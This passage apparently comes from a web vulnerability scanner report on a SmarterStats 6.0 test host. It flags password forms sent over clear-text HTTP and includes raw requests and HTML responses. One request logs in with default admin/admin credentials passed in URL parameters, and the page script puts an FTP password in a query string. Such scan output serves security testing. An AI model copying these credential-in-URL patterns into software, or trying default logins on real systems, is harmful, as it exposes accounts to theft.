                           <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_6" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$6" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_6">Google (CA)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_14" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$14" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_14">Google (IT)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_21" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$21" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_21">Google (UK)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_7" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$7" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_7">Google (CN)</label></td><td></td><td></td>
                       </tr>
                   </table></td>
               </tr>
           </table>

               </span></div>
       
               
               
           </div>
   
       
</div>

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
   <div id="pgrLogWrapper">
       
<span class="HyperPagerWrapper" id="ctl00_NavPH_pgrLog">
<span class="HyperPager">
<span class="hpGroup">First</span>
<span class="hpGroup">&lt;&lt;</span>
<span class="hpGroup">&lt;</span>
<span class="hpPageCurrent">1</span>
<span class="hpPage">of 1</span>
<span class="hpGroup">&gt;</span>
<span class="hpGroup">&gt;&gt;</span>
<span class="hpGroup">Last</span>
</span>
</span>


   </div>

           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('admin/frmsite', '');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       

   <script type="text/javascript">
   <!--

function DoPopupWindowClose() {
try {
if (window.opener) {
if (window.opener.DoRefresh) window.opener.DoRefresh(true);
if (window.opener._extContentElement.contentWindow.UpdateGrid)
window.opener._extContentElement.contentWindow.UpdateGrid(false);
}
} catch (err) { };
window.close();
}

function FtpBrowse()
{
var targetControlId = "ctl00_MPH_txtFtpDirectory";
var ftppassword = $("#ctl00_MPH_txtFtpPassword_SettingText").val();
var ftpuser = $("#ctl00_MPH_txtFtpUsername_SettingText").val();
var ftpport = $("#ctl00_MPH_txtFtpPort_SettingText").val();
var ftpserver = $("#ctl00_MPH_txtFtpServer").val();
var ftpwildcard = $("#ctl00_MPH_txtFtpWildcard_SettingText").val();
var url = "/Admin/Popups/frmFtpFileBrowser.aspx?password=" + ftppassword + "&username=" + ftpuser +
        "&port=" + ftpport + "&server=" + ftpserver + "&wildcard=" + ftpwildcard;
       parent.SpawnHyperWindowWithElement(url, 450, 400, DoNothing, $('#' + targetControlId));
}

   function SmarterLogBrowse()
   {
    var serverId = GetSelectedServerId();
    LogBrowseBase(serverId, "ctl00_MPH_txtSmarterLogDirectory");
   }
   
   function ExportLogBrowse()
   {
    var serverId = GetSelectedServerId();
    LogBrowseBase(serverId, "ctl00_MPH_txtExportLogDirectory");
   }
   
function LogBrowseBase(serverId, controlId) {
var url = "/Admin/Popups/frmRemoteFileBrowser.aspx?serverId="+serverId;
parent.SpawnHyperWindowWithElement(url, 450, 338, DoNothing, $('#' + controlId));
}

   function DoubleClick(newUrl, uid, isNew)
   {
SpawnHyperWindow(newUrl, 430, 200, DoRefresh);
   }

function ImportLogLocation() {
var serverId = GetSelectedServerId();
var url = "/Admin/Popups/frmPopupIISSiteList.aspx?serverId=" + serverId + "&UniqueID=9b4e05381dee4ab3baa4091821fa7b8d";
SpawnHyperWindow(url, 450, 338, UpdateIISImport);
}

   function GetSelectedServerId()
   {
    var lstServerClientId = "ctl00_MPH_lstServer_SettingDropDown";
    var lstServer = document.getElementById(lstServerClientId);
   
    if (lstServer)
    return lstServer.options[lstServer.selectedIndex].value;
    else
    return "0";
   }
   
   function DoNothing()
   {
   }
   
   function DoRefreshLogLocation()
   {
       __doPostBack('ctl00$MPH$btnRefresh','LogLocation');
   }
   
   function DoRefresh()
   {
    __doPostBack('ctl00$MPH$btnRefresh','');
   }
   
   function UpdateIISImport()
   {
    __doPostBack('ctl00$MPH$btnUpdateIISImport','');
   }
   
   function TabChanged(tabSelected)
{
       (tabSelected.attr('id') != "ctl00_TPH_HyperTabStrip1_HyperTabItem3") ? $("#logLocationButtons").hide() : $("#logLocationButtons").show();
       (tabSelected.attr('id') != "ctl00_TPH_HyperTabStrip1_HyperTabItem7") ? $("#pgrLogWrapper").hide() : $("#pgrLogWrapper").show();
}
       
   -->
   </script>


   

<script type="text/javascript">
//<![CDATA[

function ShowContextMenu_ctl00_MPH_ctl02(evt) {
   $('#ctl00_MPH_ctl02').showHyperContextMenu(evt);
   evt.cancelBubble = true;
   if (evt.stopPropagation) evt.stopPropagation();
   return false;
}
var confirmationDialogKeys = new Object();
confirmationDialogKeys['@Delete'] = 'Are you sure you want to delete the <span id="DeleteConfirmCount">0</span> selected item(s)?';
confirmationDialogKeys['@GenericDelete'] = confirmationDialogKeys['@Delete'];
confirmationDialogKeys['@DeleteConfirm'] = 'Are you sure you want to delete all items?';
confirmationDialogKeys['@PurgeConfirm'] = 'Are you sure you want to purge all items marked for deletion?';
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fAdmin\x2ffrmSite\x2easpx?'); });
$('#ctl00_MPH_txtAdminNewPassword_SettingText').val('');
var ctl00_MPH_grdLogLocations_Url6485 = new Array();
function DelayedSetupctl00_MPH_grdLogLocations() { }
if (self.ctl00_MPH_grdLogLocationsHGIsCallback)
   DelayedSetupctl00_MPH_grdLogLocations();
else
   HGAddLoadEvent(function(){setTimeout(DelayedSetupctl00_MPH_grdLogLocations, 100);});
self.ctl00_MPH_grdLogLocationsHGIsCallback = true;
WebForm_AutoFocus('ctl00_MPH_txtDomainName_SettingText');$(function() { SetTopTitle('Sites'); });
$(function() { $('#ctl00_BPH_mnu1').hyperMenu({"ClearFloat":false,"IsContextMenu":false,"CollapseDelay":300,"DropShadows":true,"ClickableMenuItemsWithSubMenus":false,"FunctionMap":{"ctl00_BPH_mnu1_btnImport_btnImportIIS":"ImportLogLocation();"},"ClientCallbacks":{}}); });
function DoDeleteQuery_ctl00_BPH_btnDelete() {
   if (!self.ctl00_MPH_grdLogLocations) return ShowAlertWindow('No item has been selected');
   var count = ctl00_MPH_grdLogLocations.GetSelectedRowCount ? ctl00_MPH_grdLogLocations.GetSelectedRowCount() : ctl00_MPH_grdLogLocations.GetSelectedRows().length;
   if (count == 0) return ShowAlertWindow('No item has been selected');
   else parent.ShowConfirmWindow('Are you sure you want to delete the {0} selected item(s)?',count,'Generic',DoDelete_ctl00_BPH_btnDelete);
}
function DoDelete_ctl00_BPH_btnDelete() { __doPostBack('ctl00$BPH$btnDelete',''); }
$(function() { $('#ctl00_TPH_HyperTabStrip1').hyperTabStrip({"MultiPageClientID":"ctl00_MPH_MP1","FunctionMap":{},"PageViewMap":{"ctl00_TPH_HyperTabStrip1_HyperTabItem1":"ctl00_MPH_OptionsTab","ctl00_TPH_HyperTabStrip1_HyperTabItem2":"ctl00_MPH_LogOptionsTab","ctl00_TPH_HyperTabStrip1_HyperTabItem3":"ctl00_MPH_LogLocationsTab","ctl00_TPH_HyperTabStrip1_HyperTabItem4":"ctl00_MPH_LogFTPTab","ctl00_TPH_HyperTabStrip1_HyperTabItem5":"ctl00_MPH_SeoOptionsTab","ctl00_TPH_HyperTabStrip1_HyperTabItem7":"ctl00_MPH_LogStatusTab","ctl00_TPH_HyperTabStrip1_HyperTabItem8":"ctl00_MPH_SEOStatusTab"},"ClientCallbacks":{"onTabChanged":"TabChanged"}}); });
modules['vmNotBlank_txt']='Must have a value';
$(function() {$vc({"lt":"Site Name","vcID":"ctl00_MPH_txtDomainName_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},true);});
modules['vmOptional_txt']='Value is optional';
$(function() {$vc({"lt":"Site Url","vcID":"ctl00_MPH_txtDomainUrl_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
modules['vmNumber_txt']='Must be a number';
modules['vmNumberGreater_txt']='Must be {0} or greater';
$(function() {$vc({"lt":"Site ID","vcID":"ctl00_MPH_txtSiteId_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
$(function() {$vc({"lt":"Site Admin Username","vcID":"ctl00_MPH_txtAdminNewUserName_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},false);});
$(function() {$vc({"lt":"Site Admin Password","vcID":"ctl00_MPH_txtAdminNewPassword_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},false);});
$(function() {$vc({"lt":"Export Url","vcID":"ctl00_MPH_txtLogFileExportLocURL_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() {$vc({"lt":"Default Documents (one per line)","vcID":"ctl00_MPH_txtDefaultDocuments_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() { $('#ctl00_MPH_ctl02').hyperMenu({"ClearFloat":false,"IsContextMenu":true,"CollapseDelay":300,"DropShadows":true,"ClickableMenuItemsWithSubMenus":false,"FunctionMap":{"ctl00_MPH_ctl02_hm0":"__doPostBack(\u0027ctl00$BPH$mnu1\u0027,\u0027ctl00_BPH_mnu1_btnAdd\u0027)","ctl00_MPH_ctl02_hm0_hm0":"__doPostBack(\u0027ctl00$BPH$mnu1\u0027,\u0027ctl00_BPH_mnu1_btnAdd_btnAddLogLocation\u0027)","ctl00_MPH_ctl02_hm1":"__doPostBack(\u0027ctl00$BPH$btnEdit\u0027,\u0027\u0027)","ctl00_MPH_ctl02_hm2":"DoDeleteQuery_ctl00_BPH_btnDelete();"},"ClientCallbacks":{}}); });
$(function() {$vc({"lt":"Max Keywords","vcID":"ctl00_MPH_ucSiteSeoSettings_txtSeoMaxKeywords_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
$(function() {$vc({"lt":"Max Competitors","vcID":"ctl00_MPH_ucSiteSeoSettings_txtSeoMaxCompetitors_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
$(function() {$vc({"lt":"Max Position to Retrieve","vcID":"ctl00_MPH_ucSiteSeoSettings_txtSeoMaxRanking_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
//]]>
</script>
</form>
</body>
</html>


4.4. http://vulnerable.smarterstats.6.0.host:9999/Client/frmUser.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Client/frmUser.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /Client/frmUser.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Mon, 11 Oct 2010 21:06:10 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17370
Connection: Close



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Users - SmarterStats
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmUser.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>

       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1','','tctl00$TPH$UpdatePanel3','','tctl00$MPH$UpdatePanel5',''], [], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       Users
                   </div>
               </div>
           </div>
       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
<div id="ctl00_BPH_btnSave" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$btnSave',''); return false;"><span class="BBInner">Save</span></a></div>


           </div>
           <div class="ButtonBarRight">
               
<div id="ctl00_BrPH_btnCancel" class="BBButton"><a class="ButtonBarAnchor" href="frmUsers&#x2e;aspx" onclick="window.location.href = 'frmUsers\x2easpx'; return false;" tabindex='0'><span class="BBInner">Cancel</span></a></div>

           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               
           </span>
       <div id="ctl00_trTabStrip" class="TabStripContainer">
           
<div id="ctl00_TPH_UpdatePanel3">
   

<!-- HyperTabStrip -->
   <div class='htsTabStrip htsTabBar'><ul id='ctl00_TPH_HyperTabStrip1'>
       <li class='htsItem htsFirst htsSelected' id='ctl00_TPH_HyperTabStrip1_HyperTabItem1'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>User</span></span></a></li>
       <li class='htsItem htsLast' id='ctl00_TPH_HyperTabStrip1_HyperTabItem2'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Report Options</span></span></a></li>
   </ul>
   <input type="hidden" name="ctl00$TPH$HyperTabStrip1$SelectedTab" id="ctl00_TPH_HyperTabStrip1_SelectedTab" value="ctl00_TPH_HyperTabStrip1_HyperTabItem1" /><div class='htsClear'><div class='ie6fix'>&nbsp;</div></div></div>
   

</div>

       </div>
       <div id="Scrollable" class="ContentDiv">
           
<div id="ctl00_MPH_UpdatePanel5">
   

<!-- HyperMultiPage -->
   <div class='' id='ctl00_MPH_MP1'>
       <input type="hidden" name="ctl00$MPH$VisiblePage" id="ctl00_MPH_VisiblePage" value="ctl00_MPH_UserTab" />

<div id='ctl00_MPH_UserTab' class='' >
           <span id="ctl00_MPH_UserTab">
<table class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_txtUserName">
                   <td id="ctl00_MPH_txtUserName_Label" class="Indent Fixed">Username</td><td id="ctl00_MPH_txtUserName_Setting" class="Setting"><input name="ctl00$MPH$txtUserName_SettingText" type="text" id="ctl00_MPH_txtUserName_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_txtNewPassword">
                   <td id="ctl00_MPH_txtNewPassword_Label" class="Indent Fixed">Password</td><td id="ctl00_MPH_txtNewPassword_Setting" class="Setting"><input name="ctl00$MPH$txtNewPassword_SettingText" type="password" id="ctl00_MPH_txtNewPassword_SettingText" class="text" autocomplete="off" /></td>
               </tr><tr id="ctl00_MPH_txtNewPasswordConfirmed">
                   <td id="ctl00_MPH_txtNewPasswordConfirmed_Label" class="Indent Fixed">Confirm Password</td><td id="ctl00_MPH_txtNewPasswordConfirmed_Setting" class="Setting"><input name="ctl00$MPH$txtNewPasswordConfirmed_SettingText" type="password" id="ctl00_MPH_txtNewPasswordConfirmed_SettingText" class="text" autocomplete="off" /></td>
               </tr><tr id="ctl00_MPH_chkDomainAdmin">
                   <td id="ctl00_MPH_chkDomainAdmin_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkDomainAdmin_Setting" class="Setting"><input id="ctl00_MPH_chkDomainAdmin_SettingCheck" type="checkbox" name="ctl00$MPH$chkDomainAdmin_SettingCheck" /><label for="ctl00_MPH_chkDomainAdmin_SettingCheck">Mark as Administrator</label></td>
               </tr>
           </table>
</span></div>
       

<div id='ctl00_MPH_ReportOptionsTab' class='' style='display:none'>
           <span id="ctl00_MPH_ReportOptionsTab">
<table class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_lstDefaultDateRange">
                   <td id="ctl00_MPH_lstDefaultDateRange_Label" class="Indent Fixed">Default Date Range</td><td id="ctl00_MPH_lstDefaultDateRange_Setting" class="Setting"><select name="ctl00$MPH$lstDefaultDateRange_SettingDropDown" id="ctl00_MPH_lstDefaultDateRange_SettingDropDown">
                       <option value="Today">Today</option>
                       <option value="Yesterday">Yesterday</option>
                       <option selected="selected" value="Last7Days">Last 7 Days</option>
                       <option value="WeekToDate">Week to Date</option>
                       <option value="Last30Days">Last 30 Days</option>
                       <option value="MonthToDate">Month to Date</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_lstDefaultRows">
                   <td id="ctl00_MPH_lstDefaultRows_Label" class="Indent Fixed">Default Report Rows</td><td id="ctl00_MPH_lstDefaultRows_Setting" class="Setting"><select name="ctl00$MPH$lstDefaultRows_SettingDropDown" id="ctl00_MPH_lstDefaultRows_SettingDropDown">
                       <option value="10">10</option>
                       <option selected="selected" value="25">25</option>
                       <option value="50">50</option>
                       <option value="100">100</option>
                       <option value="500">500</option>
                       <option value="1000">1000</option>
                       <option value="2000">2000</option>
                       <option value="3000">3000</option>
                       <option value="4000">4000</option>
                       <option value="5000">5000</option>
                       <option value="6000">6000</option>
                       <option value="7000">7000</option>
                       <option value="8000">8000</option>
                       <option value="9000">9000</option>
                       <option value="10000">10000</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_lstSeoReportCharts">
                   <td id="ctl00_MPH_lstSeoReportCharts_Label" class="Indent Fixed">SEO Report Charts</td><td id="ctl00_MPH_lstSeoReportCharts_Setting" class="Setting"><select name="ctl00$MPH$lstSeoReportCharts_SettingDropDown" id="ctl00_MPH_lstSeoReportCharts_SettingDropDown">
                       <option value="none">None</option>
                       <option selected="selected" value="all">All</option>
                       <option value="trendonly">Trend Reports Only</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_chkResolveIps">
                   <td id="ctl00_MPH_chkResolveIps_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkResolveIps_Setting" class="Setting"><input id="ctl00_MPH_chkResolveIps_SettingCheck" type="checkbox" name="ctl00$MPH$chkResolveIps_SettingCheck" /><label for="ctl00_MPH_chkResolveIps_SettingCheck">Enable IP address resolution</label></td>
               </tr><tr id="ctl00_MPH_chkAutoGenerate">
                   <td id="ctl00_MPH_chkAutoGenerate_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkAutoGenerate_Setting" class="Setting"><input id="ctl00_MPH_chkAutoGenerate_SettingCheck" type="checkbox" name="ctl00$MPH$chkAutoGenerate_SettingCheck" checked="checked" /><label for="ctl00_MPH_chkAutoGenerate_SettingCheck">Generate reports automatically on page load</label></td>
               </tr>
           </table>
</span></div>
       

</div>
   

</div>

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('client/frmuser', '');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       

<script type="text/javascript">
function refresh() {
parent.location.href = '../default.aspx?area=userskin';
}
</script>


   

<script type="text/javascript">
//<![CDATA[
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fClient\x2ffrmUser\x2easpx?'); });
$('#ctl00_MPH_txtNewPassword_SettingText').val('');
$('#ctl00_MPH_txtNewPasswordConfirmed_SettingText').val('');
$(function() { SetTopTitle('Users'); });
$(function() { $('#ctl00_TPH_HyperTabStrip1').hyperTabStrip({"MultiPageClientID":"ctl00_MPH_MP1","FunctionMap":{},"PageViewMap":{"ctl00_TPH_HyperTabStrip1_HyperTabItem1":"ctl00_MPH_UserTab","ctl00_TPH_HyperTabStrip1_HyperTabItem2":"ctl00_MPH_ReportOptionsTab"},"ClientCallbacks":{}}); });
modules['vmNotBlank_txt']='Must have a value';
$(function() {$vc({"lt":"Username","vcID":"ctl00_MPH_txtUserName_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},false);});
modules['vmMustMatch_txt']='Must match {0}';
$(function() {$vc({"lt":"Confirm Password","vcID":"ctl00_MPH_txtNewPasswordConfirmed_SettingText","VMs":["vmMustMatch"],"VPs":{"vmRequired":false,"vmMustMatch":"\u003cfont color=red\u003e[@NewPassword]\u003c/font\u003e","vmMustMatchField":"ctl00_MPH_txtNewPassword_SettingText"}},false);});
//]]>
</script>
</form>
</body>
</html>


4.5. http://vulnerable.smarterstats.6.0.host:9999/Login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Login.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /Login.aspx?shortcutLink=autologin&txtSiteID=admin&txtUser=admin&txtPass=admin HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:28:41 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Set-Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; path=/; HttpOnly
Set-Cookie: SelectedLanguage=; expires=Sat, 10-Oct-2020 03:28:41 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 8885



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   SmarterStats Login - SmarterStats
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


   <script type="text/javascript">
       if (parent.isRoot != null)
           parent.location.href = location.href;
       if (parent.parent.isRoot != null)
           parent.parent.location.href = location.href;
   </script>

<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Login/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="Login" dir="ltr">
   <form name="aspnetForm" method="post" action="Login.aspx?shortcutLink=autologin&amp;txtSiteID=admin&amp;txtUser=admin&amp;txtPass=admin" id="aspnetForm">
<div>
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>

<script language="javascript">window.onload = function() { if (document.getElementById('ctl00$MPH$txtSiteId') != null) document.getElementById('ctl00$MPH$txtSiteId').focus(); } </script>
<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
<script src="/WebResource.axd?d=tmbPiP2D38VVojyjJVsEkXwe8X4rw_c60mStWfistR8pyJPOf4ElR79y8d6v9XE45y9Xuon7XBs01GFx3aJPBQ4-yv7YCKPFvc37E1RidaE1&amp;t=634219308989960000" type="text/javascript"></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1',''], [], [], 90, 'ctl00');
//]]>
</script>

